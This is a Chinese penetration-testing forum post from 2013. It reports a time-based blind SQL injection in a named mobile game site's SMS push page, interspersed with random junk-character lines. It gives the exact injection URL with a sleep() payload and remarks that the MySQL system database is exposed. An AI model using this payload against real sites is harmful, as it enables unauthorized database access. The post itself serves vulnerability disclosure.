中国网络渗透测试联盟
标题:
凤凰手机游戏网SQL盲注漏洞
[打印本页]
作者:
admin
时间:
2013-4-4 17:34
标题:
凤凰手机游戏网SQL盲注漏洞
简要描述:
- P6 V& D: O! Z4 n% ~8 H
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。
$ N2 T& P- M- h! u, p7 c3 \/ |/ @' b
6 d5 I e) m! U; p
详细说明:
1 V. R: H' o! Q; N! o0 s
存在SQL盲注url:
! A3 h! w4 E+ E2 f V# Z
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1
( m1 U5 G& p5 @$ P7 i/ x+ C
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
& ~8 P! m U+ T' y# {. [3 d$ e
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
, I6 x/ B9 V( X! e
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
0 j# r- u7 s6 |9 I& j
5 o: H4 q9 T. y& `% ]
能看到mysql系统数据库,看来user权限应该很高的。。
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2